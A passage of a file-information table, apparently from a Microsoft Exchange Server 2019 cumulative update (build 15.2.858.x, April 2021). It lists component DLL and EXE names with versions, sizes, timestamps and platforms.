Microsoft.exchange.common.search.dll| 15.2.858.9| 108,928| 04-Apr-2021| 08:36| x86
Microsoft.exchange.common.search.eventlog.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x64
Microsoft.exchange.common.smtp.dll| 15.2.858.9| 51,584| 04-Apr-2021| 08:31| x86
Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.858.9| 36,744| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.transport.azure.dll| 15.2.858.9| 27,512| 04-Apr-2021| 08:31| x86
Microsoft.exchange.common.transport.monitoringconfig.dll| 15.2.858.9| 1,042,304| 04-Apr-2021| 08:35| x86
Microsoft.exchange.commonmsg.dll| 15.2.858.9| 29,072| 04-Apr-2021| 08:32| x64
Microsoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:44| x64
Microsoft.exchange.compliance.auditservice.core.dll| 15.2.858.10| 181,128| 04-Apr-2021| 08:39| x86
Microsoft.exchange.compliance.auditservice.messages.dll| 15.2.858.9| 30,088| 04-Apr-2021| 08:39| x64
Microsoft.exchange.compliance.common.dll| 15.2.858.9| 22,392| 04-Apr-2021| 08:30| x86
Microsoft.exchange.compliance.crimsonevents.dll| 15.2.858.9| 85,912| 04-Apr-2021| 08:32| x64
Microsoft.exchange.compliance.dll| 15.2.858.9| 41,368| 04-Apr-2021| 08:29| x86
Microsoft.exchange.compliance.recordreview.dll| 15.2.858.9| 37,240| 04-Apr-2021| 08:32| x86
Microsoft.exchange.compliance.supervision.dll| 15.2.858.10| 50,560| 04-Apr-2021| 08:31| x86
Microsoft.exchange.compliance.taskcreator.dll| 15.2.858.10| 33,176| 04-Apr-2021| 08:32| x86
Microsoft.exchange.compliance.taskdistributioncommon.dll| 15.2.858.10| 1,100,160| 04-Apr-2021| 08:30| x86
Microsoft.exchange.compliance.taskdistributionfabric.dll| 15.2.858.10| 206,744| 04-Apr-2021| 08:31| x86
Microsoft.exchange.compliance.taskplugins.dll| 15.2.858.10| 210,840| 04-Apr-2021| 08:29| x86
Microsoft.exchange.compression.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:31| x86
Microsoft.exchange.configuration.certificateauth.dll| 15.2.858.9| 37,784| 04-Apr-2021| 08:39| x86
Microsoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:27| x64
Microsoft.exchange.configuration.core.dll| 15.2.858.9| 145,800| 04-Apr-2021| 08:31| x86
Microsoft.exchange.configuration.core.eventlog.dll| 15.2.858.9| 14,224| 04-Apr-2021| 08:28| x64
Microsoft.exchange.configuration.delegatedauth.dll| 15.2.858.9| 53,128| 04-Apr-2021| 08:33| x86
Microsoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:32| x64
Microsoft.exchange.configuration.diagnosticsmodules.dll| 15.2.858.9| 23,448| 04-Apr-2021| 08:39| x86
Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.858.9| 13,208| 04-Apr-2021| 08:27| x64
Microsoft.exchange.configuration.failfast.dll| 15.2.858.9| 54,680| 04-Apr-2021| 08:42| x86
Microsoft.exchange.configuration.failfast.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64
Microsoft.exchange.configuration.objectmodel.dll| 15.2.858.10| 1,846,152| 04-Apr-2021| 08:30| x86
Microsoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.858.9| 30,104| 04-Apr-2021| 08:28| x64
Microsoft.exchange.configuration.redirectionmodule.dll| 15.2.858.9| 68,496| 04-Apr-2021| 08:31| x86
Microsoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:33| x64
Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.858.9| 21,376| 04-Apr-2021| 08:42| x86
Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:28| x64
Microsoft.exchange.connectiondatacollector.dll| 15.2.858.9| 25,984| 04-Apr-2021| 08:38| x86
Microsoft.exchange.connections.common.dll| 15.2.858.9| 169,856| 04-Apr-2021| 08:34| x86
Microsoft.exchange.connections.eas.dll| 15.2.858.9| 330,136| 04-Apr-2021| 08:34| x86
Microsoft.exchange.connections.imap.dll| 15.2.858.9| 173,960| 04-Apr-2021| 08:43| x86
Microsoft.exchange.connections.pop.dll| 15.2.858.9| 71,048| 04-Apr-2021| 08:32| x86
Microsoft.exchange.contentfilter.wrapper.exe| 15.2.858.9| 203,672| 04-Apr-2021| 08:43| x64
Microsoft.exchange.context.client.dll| 15.2.858.9| 27,008| 04-Apr-2021| 08:31| x86
Microsoft.exchange.context.configuration.dll| 15.2.858.9| 51,592| 04-Apr-2021| 08:30| x86
Microsoft.exchange.context.core.dll| 15.2.858.9| 51,080| 04-Apr-2021| 08:31| x86
Microsoft.exchange.context.datamodel.dll| 15.2.858.9| 46,984| 04-Apr-2021| 08:30| x86
Microsoft.exchange.core.strings.dll| 15.2.858.9| 1,093,520| 04-Apr-2021| 08:32| x86
Microsoft.exchange.core.timezone.dll| 15.2.858.9| 57,240| 04-Apr-2021| 08:32| x86
Microsoft.exchange.data.applicationlogic.deep.dll| 15.2.858.9| 326,536| 04-Apr-2021| 08:30| x86
Microsoft.exchange.data.applicationlogic.dll| 15.2.858.9| 3,354,504| 04-Apr-2021| 08:30| x86
Microsoft.exchange.data.applicationlogic.eventlog.dll| 15.2.858.9| 35,728| 04-Apr-2021| 08:32| x64
Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:43| x86
Microsoft.exchange.data.connectors.dll| 15.2.858.9| 165,248| 04-Apr-2021| 08:28| x86
Microsoft.exchange.data.consumermailboxprovisioning.dll| 15.2.858.9| 619,384| 04-Apr-2021| 08:33| x86
Microsoft.exchange.data.directory.dll| 15.2.858.9| 7,792,016| 04-Apr-2021| 08:29| x86
Microsoft.exchange.data.directory.eventlog.dll| 15.2.858.9| 80,280| 04-Apr-2021| 08:34| x64
Microsoft.exchange.data.dll| 15.2.858.9| 1,790,360| 04-Apr-2021| 08:27| x86
Microsoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.858.10| 1,626,488| 04-Apr-2021| 08:33| x86
Microsoft.exchange.data.ha.dll| 15.2.858.9| 375,192| 04-Apr-2021| 08:32| x86
Microsoft.exchange.data.imageanalysis.dll| 15.2.858.9| 105,352| 04-Apr-2021| 08:31| x86
Microsoft.exchange.data.mailboxfeatures.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:39| x86
Microsoft.exchange.data.mailboxloadbalance.dll| 15.2.858.9| 224,632| 04-Apr-2021| 08:32| x86
Microsoft.exchange.data.mapi.dll| 15.2.858.9| 186,752| 04-Apr-2021| 08:38| x86
Microsoft.exchange.data.metering.contracts.dll| 15.2.858.9| 39,832| 04-Apr-2021| 08:31| x86
Microsoft.exchange.data.metering.dll| 15.2.858.9| 119,176| 04-Apr-2021| 08:30| x86
Microsoft.exchange.data.msosyncxsd.dll| 15.2.858.9| 968,072| 04-Apr-2021| 08:27| x86
Microsoft.exchange.data.notification.dll| 15.2.858.9| 141,184| 04-Apr-2021| 08:32| x86
Microsoft.exchange.data.personaldataplatform.dll| 15.2.858.9| 769,416| 04-Apr-2021| 08:38| x86
Microsoft.exchange.data.providers.dll| 15.2.858.9| 139,640| 04-Apr-2021| 08:30| x86
Microsoft.exchange.data.provisioning.dll| 15.2.858.9| 56,720| 04-Apr-2021| 08:30| x86
Microsoft.exchange.data.rightsmanagement.dll| 15.2.858.9| 453,008| 04-Apr-2021| 08:39| x86
Microsoft.exchange.data.scheduledtimers.dll| 15.2.858.9| 32,632| 04-Apr-2021| 08:39| x86
Microsoft.exchange.data.storage.clientstrings.dll| 15.2.858.9| 256,912| 04-Apr-2021| 08:28| x86
Microsoft.exchange.data.storage.dll| 15.2.858.9| 11,816,840| 04-Apr-2021| 08:28| x86
Microsoft.exchange.data.storage.eventlog.dll| 15.2.858.9| 37,768| 04-Apr-2021| 08:33| x64
Microsoft.exchange.data.storageconfigurationresources.dll| 15.2.858.9| 655,768| 04-Apr-2021| 08:27| x86
Microsoft.exchange.data.storeobjects.dll| 15.2.858.9| 175,488| 04-Apr-2021| 08:32| x86
Microsoft.exchange.data.throttlingservice.client.dll| 15.2.858.9| 36,240| 04-Apr-2021| 08:43| x86
Microsoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:34| x64
Microsoft.exchange.data.throttlingservice.eventlog.dll| 15.2.858.9| 14,224| 04-Apr-2021| 08:34| x64
Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:32| x64
Microsoft.exchange.datacenterstrings.dll| 15.2.858.10| 72,600| 04-Apr-2021| 08:34| x86
Microsoft.exchange.delivery.eventlog.dll| 15.2.858.9| 13,176| 04-Apr-2021| 08:33| x64
Microsoft.exchange.diagnostics.certificatelogger.dll| 15.2.858.9| 22,912| 04-Apr-2021| 08:31| x86
Microsoft.exchange.diagnostics.dll| 15.2.858.9| 2,213,272| 04-Apr-2021| 08:27| x86
Microsoft.exchange.diagnostics.dll.deploy| 15.2.858.9| 2,213,272| 04-Apr-2021| 08:27| Not applicable
Microsoft.exchange.diagnostics.performancelogger.dll| 15.2.858.9| 23,936| 04-Apr-2021| 08:30| x86
Microsoft.exchange.diagnostics.service.common.dll| 15.2.858.9| 546,696| 04-Apr-2021| 08:31| x86
Microsoft.exchange.diagnostics.service.eventlog.dll| 15.2.858.9| 215,416| 04-Apr-2021| 08:33| x64
Microsoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.858.9| 194,440| 04-Apr-2021| 08:31| x86
Microsoft.exchange.diagnostics.service.exe| 15.2.858.9| 146,296| 04-Apr-2021| 08:30| x86
Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.858.9| 27,512| 04-Apr-2021| 08:30| x86
Microsoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.858.9| 13,696| 04-Apr-2021| 08:27| x64
Microsoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.858.10| 49,536| 04-Apr-2021| 08:39| x86
Microsoft.exchange.directory.topologyservice.eventlog.dll| 15.2.858.9| 28,024| 04-Apr-2021| 08:28| x64
Microsoft.exchange.directory.topologyservice.exe| 15.2.858.9| 208,792| 04-Apr-2021| 08:39| x86
Microsoft.exchange.disklocker.events.dll| 15.2.858.9| 88,984| 04-Apr-2021| 08:34| x64
Microsoft.exchange.disklocker.interop.dll| 15.2.858.9| 32,664| 04-Apr-2021| 08:31| x86
Microsoft.exchange.drumtesting.calendarmigration.dll| 15.2.858.10| 45,952| 04-Apr-2021| 08:39| x86
Microsoft.exchange.drumtesting.common.dll| 15.2.858.10| 18,840| 04-Apr-2021| 08:38| x86
Microsoft.exchange.dxstore.dll| 15.2.858.9| 473,464| 04-Apr-2021| 08:32| x86
Microsoft.exchange.dxstore.ha.events.dll| 15.2.858.9| 206,224| 04-Apr-2021| 08:33| x64
Microsoft.exchange.dxstore.ha.instance.exe| 15.2.858.10| 36,744| 04-Apr-2021| 08:39| x86
Microsoft.exchange.eac.flighting.dll| 15.2.858.9| 131,464| 04-Apr-2021| 08:27| x86
Microsoft.exchange.edgecredentialsvc.exe| 15.2.858.9| 21,896| 04-Apr-2021| 08:39| x86
Microsoft.exchange.edgesync.common.dll| 15.2.858.9| 148,360| 04-Apr-2021| 08:44| x86
Microsoft.exchange.edgesync.datacenterproviders.dll| 15.2.858.9| 220,032| 04-Apr-2021| 08:43| x86
Microsoft.exchange.edgesync.eventlog.dll| 15.2.858.9| 23,944| 04-Apr-2021| 08:32| x64
\nMicrosoft.exchange.edgesyncsvc.exe| 15.2.858.9| 97,664| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.858.9| 1,266,048| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.858.9| 1,266,048| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,508| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.858.9| 87,416| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,495| 04-Apr-2021| 08:32| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.858.9| 52,104| 04-Apr-2021| 08:33| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.858.10| 292,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.858.10| 73,112| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.858.9| 45,976| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.858.10| 218,504| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.858.9| 78,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.858.9| 35,704| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.858.10| 935,296| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.858.9| 336,264| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.858.9| 52,616| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.858.9| 32,128| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.858.9| 854,400| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.858.10| 291,736| 04-Apr-2021| 08:31| x86 
\nMicrosoft.exchange.entities.foldersharing.dll| 15.2.858.9| 39,320| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.858.10| 76,184| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.858.10| 166,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.858.10| 1,486,736| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.858.10| 122,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.858.10| 12,327,320| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.858.9| 264,072| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.858.9| 37,760| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.858.10| 186,776| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.858.10| 64,384| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.858.10| 83,856| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.858.9| 63,864| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.858.9| 100,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.858.9| 144,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.858.10| 270,208| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.858.9| 15,760| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.858.9| 254,336| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.858.10| 37,256| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.extensibility.internal.dll| 
15.2.858.9| 640,904| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.858.9| 37,272| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.858.10| 146,328| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:31| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.858.10| 595,840| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.858.10| 30,104| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.858.9| 99,720| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.858.9| 42,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.858.10| 40,344| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.858.10| 54,152| 04-Apr-2021| 08:41| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.858.9| 164,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.858.10| 58,768| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.858.9| 204,168| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.858.10| 30,600| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.858.10| 38,792| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.858.10| 48,520| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.858.9| 180,608| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.858.10| 36,736| 04-Apr-2021| 08:41| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.858.10| 25,992| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.858.10| 1,868,184| 04-Apr-2021| 08:28| x86 
\nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.858.9| 54,680| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.858.10| 35,720| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.858.9| 35,736| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.858.9| 18,312| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.858.9| 18,312| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.858.9| 263,040| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.858.9| 263,040| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.858.9| 24,960| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.858.9| 24,960| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.858.9| 53,128| 04-Apr-2021| 08:28| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.858.9| 216,960| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.858.10| 32,152| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.858.10| 281,984| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.858.10| 83,848| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.858.9| 94,088| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.858.10| 1,840,536| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.858.9| 71,552| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.858.10| 175,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.irm.formprotector.dll| 
15.2.858.9| 159,616| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.858.9| 51,080| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.858.9| 32,136| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.858.9| 100,248| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.858.10| 271,248| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.858.9| 22,408| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.858.9| 33,680| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.858.9| 18,328| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.858.9| 27,536| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.858.9| 30,608| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.858.9| 22,400| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.858.9| 66,456| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.858.9| 29,592| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.858.9| 20,352| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.858.9| 34,184| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.858.9| 103,800| 04-Apr-2021| 08:31| x86 
\nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.858.9| 15,760| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.858.9| 20,872| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.858.9| 16,264| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.858.9| 49,040| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.858.9| 44,424| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.858.9| 38,296| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.858.9| 10,375,064| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.858.9| 29,056| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.858.9| 21,384| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.858.9| 24,456| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.858.9| 89,496| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.858.9| 20,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.858.9| 26,512| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.858.9| 21,368| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.858.9| 28,040| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:39| x86 
\nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.858.9| 36,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.858.9| 16,792| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.858.9| 19,832| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.858.9| 19,840| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.858.9| 57,224| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.858.9| 16,248| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.858.9| 17,792| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.858.9| 15,248| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.858.9| 52,624| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.858.9| 34,176| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.858.9| 18,832| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.858.9| 43,392| 04-Apr-2021| 08:31| 
